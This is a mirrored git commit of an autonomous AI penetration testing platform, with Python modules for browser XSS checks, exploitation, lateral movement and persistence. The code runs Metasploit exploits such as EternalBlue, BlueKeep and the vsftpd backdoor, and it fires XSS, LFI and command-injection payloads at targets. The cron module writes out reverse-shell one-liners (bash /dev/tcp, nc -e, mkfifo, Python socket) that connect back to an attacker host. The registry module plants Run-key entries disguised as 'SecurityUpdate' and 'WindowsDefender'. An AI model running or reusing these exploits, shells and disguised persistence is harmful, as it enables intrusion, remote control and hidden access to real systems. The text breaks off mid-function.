mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-04-21 10:26:18 +02:00
NeuroSploit v3.2 - Autonomous AI Penetration Testing Platform
116 modules | 100 vuln types | 18 API routes | 18 frontend pages Major features: - VulnEngine: 100 vuln types, 526+ payloads, 12 testers, anti-hallucination prompts - Autonomous Agent: 3-stream auto pentest, multi-session (5 concurrent), pause/resume/stop - CLI Agent: Claude Code / Gemini CLI / Codex CLI inside Kali containers - Validation Pipeline: negative controls, proof of execution, confidence scoring, judge - AI Reasoning: ReACT engine, token budget, endpoint classifier, CVE hunter, deep recon - Multi-Agent: 5 specialists + orchestrator + researcher AI + vuln type agents - RAG System: BM25/TF-IDF/ChromaDB vectorstore, few-shot, reasoning templates - Smart Router: 20 providers (8 CLI OAuth + 12 API), tier failover, token refresh - Kali Sandbox: container-per-scan, 56 tools, VPN support, on-demand install - Full IA Testing: methodology-driven comprehensive pentest sessions - Notifications: Discord, Telegram, WhatsApp/Twilio multi-channel alerts - Frontend: React/TypeScript with 18 pages, real-time WebSocket updates
This commit is contained in:
Executable
Executable
+1627
File diff suppressed because it is too large
Load Diff
Executable
+1
@@ -0,0 +1 @@
|
||||
"""Browser-based security validation tools using Playwright."""
|
||||
Executable
+211
@@ -0,0 +1,211 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Playwright Runner - Low-level browser automation helpers for security testing.
|
||||
|
||||
Provides convenience functions for common browser-based security validation tasks.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
from typing import Dict, List, Optional
|
||||
from pathlib import Path
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
try:
|
||||
from playwright.async_api import async_playwright
|
||||
HAS_PLAYWRIGHT = True
|
||||
except ImportError:
|
||||
HAS_PLAYWRIGHT = False
|
||||
|
||||
|
||||
async def check_xss_reflection(url: str, payload: str, headless: bool = True) -> Dict:
    """Check whether *payload* is reflected in the page or pops a JS dialog.

    Args:
        url: Target URL (the payload should already be embedded in the query params)
        payload: The XSS payload under test
        headless: Launch the browser without a visible window

    Returns:
        Dict with reflection status, dialog detection, and a snippet of the
        page content surrounding the reflected payload
    """
    if not HAS_PLAYWRIGHT:
        return {"error": "Playwright not installed"}

    outcome = {
        "url": url,
        "payload": payload,
        "reflected": False,
        "dialog_triggered": False,
        "dialog_message": None,
        "content_snippet": ""
    }

    async with async_playwright() as pw:
        browser = await pw.chromium.launch(headless=headless)
        context = await browser.new_context(ignore_https_errors=True)
        page = await context.new_page()

        seen_dialogs = []

        async def _dismiss_dialog(dialog):
            # Record the message, then dismiss so page loading can continue.
            seen_dialogs.append(dialog.message)
            await dialog.dismiss()

        page.on("dialog", _dismiss_dialog)

        try:
            await page.goto(url, wait_until="networkidle", timeout=15000)
            body = await page.content()

            position = body.find(payload)
            if position != -1:
                outcome["reflected"] = True
                # Keep 100 chars of context on either side of the payload.
                lo = max(0, position - 100)
                hi = min(len(body), position + len(payload) + 100)
                outcome["content_snippet"] = body[lo:hi]

            if seen_dialogs:
                outcome["dialog_triggered"] = True
                outcome["dialog_message"] = seen_dialogs[0]

        except Exception as exc:
            outcome["error"] = str(exc)
        finally:
            await browser.close()

    return outcome
|
||||
|
||||
|
||||
async def capture_page_state(url: str, screenshot_path: str,
                             headless: bool = True) -> Dict:
    """Capture the full state of a page: screenshot, title, headers, cookies.

    Args:
        url: Page URL to capture
        screenshot_path: Path to save the screenshot
        headless: Run in headless mode

    Returns:
        Dict with page title, cookies, response headers, console messages
    """
    if not HAS_PLAYWRIGHT:
        return {"error": "Playwright not installed"}

    state = {
        "url": url,
        "title": "",
        "screenshot": screenshot_path,
        "cookies": [],
        "console_messages": [],
        "response_headers": {},
        "status_code": None
    }

    async with async_playwright() as pw:
        browser = await pw.chromium.launch(headless=headless)
        context = await browser.new_context(ignore_https_errors=True)
        page = await context.new_page()

        captured_console = []

        def _on_console(msg):
            captured_console.append({"type": msg.type, "text": msg.text})

        page.on("console", _on_console)

        try:
            response = await page.goto(url, wait_until="networkidle", timeout=20000)

            state["title"] = await page.title()
            # goto may return None (e.g. about:blank navigations); the
            # defaults in `state` already cover that case.
            if response is not None:
                state["status_code"] = response.status
                state["response_headers"] = dict(response.headers)

            # Make sure the destination directory exists before writing.
            Path(screenshot_path).parent.mkdir(parents=True, exist_ok=True)
            await page.screenshot(path=screenshot_path, full_page=True)

            state["cookies"] = [
                {
                    "name": cookie["name"],
                    "domain": cookie["domain"],
                    "secure": cookie["secure"],
                    "httpOnly": cookie["httpOnly"],
                    "sameSite": cookie.get("sameSite", "None"),
                }
                for cookie in await context.cookies()
            ]

            state["console_messages"] = captured_console

        except Exception as exc:
            state["error"] = str(exc)
        finally:
            await browser.close()

    return state
|
||||
|
||||
|
||||
async def test_form_submission(url: str, form_data: Dict[str, str],
                               submit_selector: str = "button[type=submit]",
                               screenshot_dir: str = "/tmp/form_test",
                               headless: bool = True) -> Dict:
    """Submit a form and capture before/after state.

    Args:
        url: URL containing the form
        form_data: Dict of selector -> value to fill
        submit_selector: CSS selector for the submit button
        screenshot_dir: Directory to store screenshots
        headless: Run in headless mode

    Returns:
        Dict with before/after screenshots, response info, and any triggered dialogs
    """
    if not HAS_PLAYWRIGHT:
        return {"error": "Playwright not installed"}

    out_dir = Path(screenshot_dir)
    out_dir.mkdir(parents=True, exist_ok=True)

    report = {
        "url": url,
        "before_screenshot": str(out_dir / "before.png"),
        "after_screenshot": str(out_dir / "after.png"),
        "dialogs": [],
        "response_url": "",
        "status": "unknown"
    }

    async with async_playwright() as pw:
        browser = await pw.chromium.launch(headless=headless)
        context = await browser.new_context(ignore_https_errors=True)
        page = await context.new_page()

        fired_dialogs = []

        async def _capture_dialog(dialog):
            # Record then dismiss so the submission flow is not blocked.
            fired_dialogs.append({"type": dialog.type, "message": dialog.message})
            await dialog.dismiss()

        page.on("dialog", _capture_dialog)

        try:
            await page.goto(url, wait_until="networkidle", timeout=15000)
            await page.screenshot(path=report["before_screenshot"])

            # Populate every requested field before submitting.
            for field_selector, field_value in form_data.items():
                await page.fill(field_selector, field_value)

            await page.click(submit_selector)
            await page.wait_for_load_state("networkidle")

            await page.screenshot(path=report["after_screenshot"], full_page=True)
            report["response_url"] = page.url
            report["dialogs"] = fired_dialogs
            report["status"] = "completed"

        except Exception as exc:
            report["error"] = str(exc)
            report["status"] = "error"
        finally:
            await browser.close()

    return report
|
||||
Executable
+8
@@ -0,0 +1,8 @@
|
||||
from .exploitation_tools import (
|
||||
ExploitDatabase,
|
||||
MetasploitWrapper,
|
||||
WebExploiter,
|
||||
SQLInjector,
|
||||
RCEExploiter,
|
||||
BufferOverflowExploiter
|
||||
)
|
||||
Executable
+363
@@ -0,0 +1,363 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Exploitation Tools - Exploit database, Metasploit wrapper, specialized exploiters
|
||||
"""
|
||||
|
||||
import subprocess
|
||||
import json
|
||||
import requests
|
||||
from typing import Dict, List
|
||||
import logging
|
||||
import time
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ExploitDatabase:
    """Exploit database search and management (wraps ``searchsploit``)."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Global configuration dictionary (kept for interface
                parity with the other tool wrappers)
        """
        self.config = config
        # Default location of the exploit-db checkout on Kali.
        self.db_path = "/usr/share/exploitdb"

    def search(self, service: str, version: str = None) -> List[Dict]:
        """Search for exploits matching a service (and optional version).

        Args:
            service (str): Service name to search for (e.g. "vsftpd")
            version (str): Optional version string to narrow the search

        Returns:
            List[Dict]: Entries with "title", "path" and "module" keys;
            empty on error or when searchsploit is unavailable.
        """
        logger.info(f"Searching exploits for: {service} {version or ''}")

        exploits = []

        try:
            cmd = ['searchsploit', service]
            if version:
                cmd.append(version)

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=30
            )

            # Parse the searchsploit table; data rows look like "title | path".
            for line in result.stdout.split('\n'):
                if '|' not in line or line.startswith('-'):
                    continue
                parts = line.split('|')
                if len(parts) < 2:
                    continue
                title = parts[0].strip()
                path = parts[1].strip()
                # Fix: skip the table header row ("Exploit Title | Path"),
                # which the old parser reported as a real exploit.
                if title == 'Exploit Title' or path == 'Path':
                    continue
                exploits.append({
                    "title": title,
                    "path": path,
                    "module": self._path_to_module(path)
                })

        except Exception as e:
            logger.error(f"Exploit search error: {e}")

        return exploits

    def _path_to_module(self, path: str) -> str:
        """Convert an exploit file path to a dotted module-style name.

        Fix: the extension is stripped only when it is an actual suffix.
        The old ``replace('.rb', '')``/``replace('.py', '')`` removed those
        substrings anywhere in the path, mangling names like
        ``my.python.thing.rb``.
        """
        for ext in ('.rb', '.py'):
            if path.endswith(ext):
                path = path[:-len(ext)]
                break
        return path.replace('/', '.')
|
||||
|
||||
|
||||
class MetasploitWrapper:
    """Metasploit Framework wrapper driven via generated resource scripts."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Global configuration; ``config["tools"]["metasploit"]``
                may override the msfconsole binary path.
        """
        self.config = config
        self.msf_path = config.get('tools', {}).get('metasploit', '/usr/bin/msfconsole')

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Execute a Metasploit exploit chosen from the vulnerable service.

        Args:
            target (str): Target IP or hostname
            vulnerability (Dict): Must carry "service" (and optionally "port")

        Returns:
            Dict: Exploitation result; {"success": False, ...} when no
            module maps to the service.
        """
        logger.info(f"Attempting Metasploit exploit on {target}")

        service = vulnerability.get('service', '').lower()
        port = vulnerability.get('port', 0)

        # Map service to exploit module
        module = self._select_module(service, vulnerability)

        if module:
            return self.run_exploit(module, target, port)

        return {"success": False, "message": "No suitable module found"}

    def _select_module(self, service: str, vulnerability: Dict) -> str:
        """Select a default Metasploit module for a service, or None."""
        modules = {
            'smb': 'exploit/windows/smb/ms17_010_eternalblue',
            'ssh': 'auxiliary/scanner/ssh/ssh_login',
            'ftp': 'exploit/unix/ftp/vsftpd_234_backdoor',
            'http': 'auxiliary/scanner/http/dir_scanner',
            'mysql': 'auxiliary/scanner/mysql/mysql_login',
            'postgres': 'auxiliary/scanner/postgres/postgres_login',
            'rdp': 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
        }

        return modules.get(service)

    def run_exploit(self, module: str, target: str, port: int = None) -> Dict:
        """Run a specific Metasploit module against a target.

        Args:
            module (str): Full module path (e.g. "exploit/unix/...")
            target (str): Target IP or hostname
            port (int): Optional target port (RPORT)

        Returns:
            Dict: success flag, raw msfconsole output, and shell info when
            a session was opened.
        """
        import os

        logger.info(f"Running module: {module}")

        result = {
            "success": False,
            "module": module,
            "target": target,
            "output": "",
            "shell_access": False
        }

        script_path = None
        try:
            # Build MSF resource script
            script_path = self._build_resource_script(module, target, port)

            # Execute via msfconsole
            cmd = [self.msf_path, '-q', '-r', script_path]
            proc = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=300
            )

            result["output"] = proc.stdout

            # Check for successful exploitation
            if 'session opened' in proc.stdout.lower():
                result["success"] = True
                result["shell_access"] = True
                result["shell_info"] = self._extract_shell_info(proc.stdout)

        except Exception as e:
            logger.error(f"Metasploit execution error: {e}")
            result["error"] = str(e)
        finally:
            # Fix: the resource script used to be left behind in /tmp forever.
            if script_path:
                try:
                    os.unlink(script_path)
                except OSError:
                    pass

        return result

    def _build_resource_script(self, module: str, target: str, port: int = None) -> str:
        """Write an MSF resource script to a secure temp file; return its path.

        Fix: uses ``tempfile.mkstemp`` instead of the old predictable
        ``/tmp/msf_resource_<timestamp>.rc`` path, which was both racy and
        guessable by other local users.
        """
        import os
        import tempfile

        fd, script_path = tempfile.mkstemp(prefix="msf_resource_", suffix=".rc")

        script_content = f"""use {module}
set RHOST {target}
"""

        if port:
            script_content += f"set RPORT {port}\n"

        script_content += """set ExitOnSession false
exploit -z
exit
"""

        with os.fdopen(fd, 'w') as f:
            f.write(script_content)

        return script_path

    def _extract_shell_info(self, output: str) -> Dict:
        """Extract shell session information from msfconsole output."""
        return {
            "type": "meterpreter",
            "established": True
        }
|
||||
|
||||
|
||||
class WebExploiter:
    """Web application exploitation (XSS / CSRF / LFI / RFI)."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Global configuration dictionary
        """
        self.config = config

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Dispatch to the exploit routine matching ``vulnerability['type']``.

        Args:
            target (str): Base URL of the vulnerable endpoint
            vulnerability (Dict): Must carry "type" (xss/csrf/lfi/rfi)

        Returns:
            Dict: Exploitation result; {"success": False, ...} for unknown types.
        """
        vuln_type = vulnerability.get('type')

        if vuln_type == 'xss':
            return self._exploit_xss(target, vulnerability)
        elif vuln_type == 'csrf':
            return self._exploit_csrf(target, vulnerability)
        elif vuln_type == 'lfi':
            return self._exploit_lfi(target, vulnerability)
        elif vuln_type == 'rfi':
            return self._exploit_rfi(target, vulnerability)

        return {"success": False, "message": "Unknown vulnerability type"}

    def _exploit_xss(self, target: str, vulnerability: Dict) -> Dict:
        """Probe ``vulnerability['parameter']`` with reflected-XSS payloads."""
        payloads = [
            '<script>alert(1)</script>',
            '<img src=x onerror=alert(1)>',
            '<svg onload=alert(1)>'
        ]

        param = vulnerability.get('parameter')

        for payload in payloads:
            try:
                # Fix: let requests build and URL-encode the query string.
                # The old f"{target}?{param}={payload}" sent the payload raw
                # and broke when target already carried a query string.
                response = requests.get(
                    target,
                    params={param: payload},
                    timeout=10
                )

                if payload in response.text:
                    return {
                        "success": True,
                        "vulnerability": "XSS",
                        "payload": payload
                    }
            except requests.RequestException:
                # Fix: only swallow network errors, not KeyboardInterrupt etc.
                continue

        return {"success": False}

    def _exploit_csrf(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit CSRF vulnerability (not yet implemented)."""
        return {"success": False, "message": "CSRF exploitation placeholder"}

    def _exploit_lfi(self, target: str, vulnerability: Dict) -> Dict:
        """Probe the ``file`` parameter with Local File Inclusion payloads."""
        payloads = [
            '../../../etc/passwd',
            '....//....//....//etc/passwd',
            '/etc/passwd'
        ]

        for payload in payloads:
            try:
                response = requests.get(
                    target,
                    params={'file': payload},
                    timeout=10
                )

                # /etc/passwd lines start with "<user>:"; "root:" is the
                # canonical marker that the file was disclosed.
                if 'root:' in response.text:
                    return {
                        "success": True,
                        "vulnerability": "LFI",
                        "payload": payload,
                        "data": response.text[:500]
                    }
            except requests.RequestException:
                continue

        return {"success": False}

    def _exploit_rfi(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit Remote File Inclusion (not yet implemented)."""
        return {"success": False, "message": "RFI exploitation placeholder"}
|
||||
|
||||
|
||||
class SQLInjector:
    """SQL Injection exploitation driven by SQLMap."""

    def __init__(self, config: Dict):
        """Store config and resolve the sqlmap binary path.

        Args:
            config (Dict): Global configuration; ``config["tools"]["sqlmap"]``
                may override the sqlmap binary location.
        """
        self.config = config
        self.sqlmap_path = config.get('tools', {}).get('sqlmap', '/usr/bin/sqlmap')

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Run a basic SQLMap database-enumeration scan against *target*.

        Returns:
            Dict: success flag plus any databases extracted from the output.
        """
        logger.info(f"Attempting SQL injection on {target}")

        result = {
            "success": False,
            "vulnerability": "SQL Injection",
            "databases": [],
            "tables": [],
            "dumped_data": []
        }

        try:
            # Enumerate databases non-interactively (--batch answers prompts).
            proc = subprocess.run(
                [self.sqlmap_path, '-u', target, '--batch', '--random-agent', '--dbs'],
                capture_output=True,
                text=True,
                timeout=300
            )

            if 'available databases' in proc.stdout.lower():
                result["success"] = True
                result["databases"] = self._extract_databases(proc.stdout)

        except Exception as e:
            logger.error(f"SQL injection error: {e}")
            result["error"] = str(e)

        return result

    def _extract_databases(self, output: str) -> List[str]:
        """Pull database names out of SQLMap's '[*] name' listing lines."""
        found = []

        for raw_line in output.split('\n'):
            # Database rows look like "[*] <name>"; ignore anything shorter.
            if '[*]' not in raw_line or len(raw_line.strip()) <= 4:
                continue
            name = raw_line.split('[*]')[1].strip()
            if name and not name.startswith('available'):
                found.append(name)

        return found
|
||||
|
||||
|
||||
class RCEExploiter:
    """Remote Code Execution exploitation via command-injection payloads."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Global configuration dictionary
        """
        self.config = config

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Probe the target's ``cmd`` parameter with shell-injection payloads.

        Args:
            target (str): Base URL of the suspected injectable endpoint
            vulnerability (Dict): Vulnerability details (currently unused)

        Returns:
            Dict: success flag, the working payload and a slice of command
            output on success; {"success": False} otherwise.
        """
        logger.info(f"Attempting RCE on {target}")

        # Classic command-separator / substitution injection payloads.
        payloads = [
            '; id',
            '| id',
            '`id`',
            '$(id)',
            '; whoami',
            '| whoami'
        ]

        for payload in payloads:
            try:
                # Fix: let requests URL-encode the shell metacharacters
                # (;, |, $, space) instead of splicing them raw into the URL.
                response = requests.get(
                    target,
                    params={'cmd': payload},
                    timeout=10
                )

                # Heuristic indicators that the injected command executed.
                # NOTE(review): 'root'/'www-data' are prone to false positives
                # on ordinary pages; 'uid='/'gid=' are the strong signals.
                if any(x in response.text.lower() for x in ['uid=', 'gid=', 'root', 'www-data']):
                    return {
                        "success": True,
                        "vulnerability": "RCE",
                        "payload": payload,
                        "output": response.text[:500]
                    }
            except requests.RequestException:
                # Fix: only swallow network errors; the old bare except also
                # ate KeyboardInterrupt/SystemExit.
                continue

        return {"success": False}
|
||||
|
||||
|
||||
class BufferOverflowExploiter:
    """Buffer overflow exploitation (placeholder — not automated)."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Global configuration dictionary
        """
        self.config = config

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit buffer overflow.

        Always returns a non-success result: real buffer-overflow work
        requires per-target analysis (offsets, bad characters, mitigations)
        that this framework does not automate.

        Args:
            target (str): Target IP or hostname
            vulnerability (Dict): Vulnerability details (currently unused)

        Returns:
            Dict: {"success": False, "message": ...}
        """
        logger.info(f"Attempting buffer overflow on {target}")

        # This is a complex topic - placeholder for demonstration
        return {
            "success": False,
            "message": "Buffer overflow exploitation requires specific target analysis"
        }
|
||||
Executable
+9
@@ -0,0 +1,9 @@
|
||||
"""
|
||||
Lateral Movement Tools
|
||||
Contains modules for moving laterally across networks
|
||||
"""
|
||||
|
||||
from .smb_lateral import SMBLateral
|
||||
from .ssh_lateral import SSHLateral
|
||||
|
||||
__all__ = ['SMBLateral', 'SSHLateral']
|
||||
Executable
+99
@@ -0,0 +1,99 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
SMB Lateral Movement - Techniques for lateral movement via SMB/CIFS
|
||||
"""
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class SMBLateral:
    """
    SMB-based lateral movement techniques including
    pass-the-hash, share enumeration, and remote execution.
    """

    def __init__(self, config: Dict):
        """Initialize the SMB lateral-movement module.

        Args:
            config (Dict): Configuration dictionary
        """
        self.config = config
        logger.info("SMBLateral module initialized")

    def enumerate_shares(self, target: str, username: str = None, password: str = None) -> Dict:
        """Enumerate SMB shares on a target system.

        Args:
            target (str): Target IP or hostname
            username (str): Username for authentication
            password (str): Password for authentication

        Returns:
            Dict: Share enumeration results
        """
        logger.info(f"Enumerating SMB shares on {target}")

        # Framework method: the real work is delegated to external tooling
        # (smbclient, crackmapexec, impacket); we only return the scaffold.
        report = {
            "target": target,
            "shares": [],
            "accessible_shares": [],
            "notes": "SMB enumeration requires external tools (smbclient, crackmapexec, impacket)"
        }

        logger.warning("SMB share enumeration requires external tools to be configured")
        return report

    def pass_the_hash(self, target: str, username: str, ntlm_hash: str) -> Dict:
        """Attempt pass-the-hash authentication against a target.

        Args:
            target (str): Target IP or hostname
            username (str): Username
            ntlm_hash (str): NTLM hash

        Returns:
            Dict: Authentication attempt results
        """
        logger.info(f"Attempting pass-the-hash to {target} as {username}")

        report = {
            "target": target,
            "username": username,
            "method": "pass-the-hash",
            "success": False,
            "notes": "Implementation requires impacket or crackmapexec"
        }

        logger.warning("Pass-the-hash requires external tools (impacket, crackmapexec)")
        return report

    def execute_remote_command(self, target: str, command: str, credentials: Dict) -> Dict:
        """Execute a command remotely via SMB.

        Args:
            target (str): Target IP or hostname
            command (str): Command to execute
            credentials (Dict): Authentication credentials

        Returns:
            Dict: Command execution results
        """
        logger.info(f"Attempting remote command execution on {target}")

        report = {
            "target": target,
            "command": command,
            "output": "",
            "success": False,
            "notes": "Remote execution requires psexec/wmiexec (impacket)"
        }

        logger.warning("Remote command execution requires external tools")
        return report
|
||||
Executable
+107
@@ -0,0 +1,107 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
SSH Lateral Movement - Techniques for lateral movement via SSH
|
||||
"""
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
import socket
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class SSHLateral:
    """
    SSH-based lateral movement techniques including
    key-based authentication, password spraying, and tunneling.
    """

    def __init__(self, config: Dict):
        """Initialize the SSH lateral-movement module.

        Args:
            config (Dict): Configuration dictionary
        """
        self.config = config
        logger.info("SSHLateral module initialized")

    def check_ssh_access(self, target: str, port: int = 22) -> bool:
        """Check if SSH is accessible on a target.

        Args:
            target (str): Target IP or hostname
            port (int): SSH port (default 22)

        Returns:
            bool: True if SSH is accessible
        """
        try:
            probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            probe.settimeout(5)
            # connect_ex returns 0 on a successful TCP connection.
            status = probe.connect_ex((target, port))
            probe.close()

            if status != 0:
                logger.info(f"SSH port {port} is closed on {target}")
                return False

            logger.info(f"SSH port {port} is open on {target}")
            return True
        except Exception as e:
            logger.error(f"Error checking SSH access: {e}")
            return False

    def enumerate_ssh_keys(self, target: str, username: str) -> Dict:
        """Enumerate potential SSH key locations.

        Args:
            target (str): Target IP or hostname
            username (str): Target username

        Returns:
            Dict: SSH key enumeration results
        """
        logger.info(f"Enumerating SSH keys for {username}@{target}")

        # Conventional key locations for the user plus root.
        candidate_paths = [
            f"/home/{username}/.ssh/id_rsa",
            f"/home/{username}/.ssh/id_ed25519",
            f"/home/{username}/.ssh/id_ecdsa",
            f"/root/.ssh/id_rsa",
            f"/root/.ssh/authorized_keys"
        ]

        return {
            "target": target,
            "username": username,
            "common_paths": candidate_paths,
            "notes": "Key extraction requires existing access to target system"
        }

    def create_ssh_tunnel(self, target: str, local_port: int, remote_host: str, remote_port: int) -> Dict:
        """Create an SSH tunnel for pivoting.

        Args:
            target (str): SSH server to tunnel through
            local_port (int): Local port to bind
            remote_host (str): Remote host to reach
            remote_port (int): Remote port to reach

        Returns:
            Dict: Tunnel creation results
        """
        logger.info(f"Creating SSH tunnel: localhost:{local_port} -> {target} -> {remote_host}:{remote_port}")

        tunnel = {
            "tunnel_type": "ssh_forward",
            "local_port": local_port,
            "remote_host": remote_host,
            "remote_port": remote_port,
            "notes": "SSH tunneling requires paramiko or external ssh command"
        }

        logger.warning("SSH tunneling requires paramiko library or ssh binary")
        return tunnel
|
||||
Executable
+9
@@ -0,0 +1,9 @@
|
||||
"""
|
||||
Persistence Tools
|
||||
Contains modules for maintaining access to compromised systems
|
||||
"""
|
||||
|
||||
from .cron_persistence import CronPersistence
|
||||
from .registry_persistence import RegistryPersistence
|
||||
|
||||
__all__ = ['CronPersistence', 'RegistryPersistence']
|
||||
Executable
+101
@@ -0,0 +1,101 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Cron Persistence - Linux persistence via cron jobs
|
||||
"""
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class CronPersistence:
    """
    Cron-based persistence techniques for Linux systems.
    """

    def __init__(self, config: Dict):
        """Initialize the CronPersistence module.

        Args:
            config (Dict): Configuration dictionary
        """
        self.config = config
        logger.info("CronPersistence module initialized")

    def generate_cron_entry(self, command: str, interval: str = "daily") -> str:
        """Generate a cron entry for persistence.

        Args:
            command (str): Command to execute
            interval (str): Execution interval (hourly, daily, weekly,
                reboot, every_5min); unknown values fall back to daily

        Returns:
            str: Cron entry string
        """
        logger.info(f"Generating cron entry for: {command}")

        intervals = {
            "hourly": "0 * * * *",
            "daily": "0 0 * * *",
            "weekly": "0 0 * * 0",
            "reboot": "@reboot",
            "every_5min": "*/5 * * * *"
        }

        # Unknown intervals fall back to daily at midnight.
        cron_time = intervals.get(interval, "0 0 * * *")
        cron_entry = f"{cron_time} {command}"

        logger.info(f"Generated cron entry: {cron_entry}")
        return cron_entry

    def suggest_cron_locations(self, username: str = None) -> Dict:
        """Suggest locations for cron-based persistence.

        Args:
            username (str): Target username

        Returns:
            Dict: Cron file locations and methods
        """
        # Fix: the old implementation left a literal None inside the
        # "cron_files" list when no username was supplied (the dict
        # comprehension only filtered None *values*, not list elements).
        cron_files = ["/etc/crontab"]
        if username:
            cron_files.append(f"/var/spool/cron/crontabs/{username}")

        return {
            "user_crontab": f"crontab -e (for user {username or 'current'})",
            "system_cron_dirs": [
                "/etc/cron.d/",
                "/etc/cron.daily/",
                "/etc/cron.hourly/",
                "/etc/cron.weekly/",
                "/var/spool/cron/crontabs/"
            ],
            "cron_files": cron_files
        }

    def generate_persistence_payload(self, callback_host: str, callback_port: int) -> Dict:
        """Generate reverse shell cron payload candidates.

        Args:
            callback_host (str): Attacker's IP/hostname
            callback_port (int): Attacker's listening port

        Returns:
            Dict: Payload information
        """
        payloads = {
            "bash_tcp": f"bash -i >& /dev/tcp/{callback_host}/{callback_port} 0>&1",
            "nc_traditional": f"nc {callback_host} {callback_port} -e /bin/bash",
            "nc_mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {callback_host} {callback_port} >/tmp/f",
            "python": f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{callback_host}\",{callback_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
        }

        return {
            "callback_host": callback_host,
            "callback_port": callback_port,
            "payloads": payloads,
            "recommendation": "Use bash_tcp or nc_mkfifo for reliability"
        }
|
||||
Executable
+125
@@ -0,0 +1,125 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Registry Persistence - Windows persistence via registry keys
|
||||
"""
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class RegistryPersistence:
    """
    Windows registry-based persistence techniques.
    """

    def __init__(self, config: Dict):
        """Initialize the RegistryPersistence module.

        Args:
            config (Dict): Configuration dictionary
        """
        self.config = config
        logger.info("RegistryPersistence module initialized")

    def get_persistence_keys(self) -> Dict:
        """Get common Windows registry keys for persistence.

        Returns:
            Dict: Registry persistence locations grouped by technique
        """
        persistence_keys = {
            "run_keys": {
                "HKCU_Run": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
                "HKLM_Run": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
                "HKCU_RunOnce": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
                "HKLM_RunOnce": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"
            },
            "startup_folders": {
                "user_startup": r"C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
                "all_users_startup": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
            },
            "services": {
                "services_key": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
            },
            "winlogon": {
                "userinit": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
                "shell": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
            }
        }

        logger.info("Retrieved Windows persistence registry keys")
        return persistence_keys

    def generate_registry_command(self, key_path: str, value_name: str, value_data: str) -> str:
        """Generate a registry modification (REG ADD) command.

        Args:
            key_path (str): Registry key path
            value_name (str): Value name
            value_data (str): Value data

        Returns:
            str: REG ADD command
        """
        cmd = f'reg add "{key_path}" /v "{value_name}" /t REG_SZ /d "{value_data}" /f'
        logger.info(f"Generated registry command: {cmd}")
        return cmd

    def generate_persistence_payload(self, payload_path: str, method: str = "run_key") -> Dict:
        """Generate a persistence configuration using the registry.

        Args:
            payload_path (str): Path to payload executable
            method (str): Persistence method — "run_key" (HKCU, current
                user) or "run_key_system" (HKLM, needs admin). Fix: the old
                docstring advertised "service"/"winlogon" methods that were
                never implemented; unknown values fall back to "run_key".

        Returns:
            Dict: Persistence configuration
        """
        methods = {
            "run_key": {
                "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
                "value": "SecurityUpdate",
                "command": self.generate_registry_command(
                    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
                    "SecurityUpdate",
                    payload_path
                )
            },
            "run_key_system": {
                "key": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
                "value": "WindowsDefender",
                "command": self.generate_registry_command(
                    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
                    "WindowsDefender",
                    payload_path
                ),
                "requires": "Administrator privileges"
            }
        }

        # Unknown methods fall back to the current-user Run key.
        result = methods.get(method, methods["run_key"])
        result["payload_path"] = payload_path
        result["method"] = method

        return result

    def get_enumeration_commands(self) -> List[str]:
        """Get commands to enumerate existing persistence mechanisms.

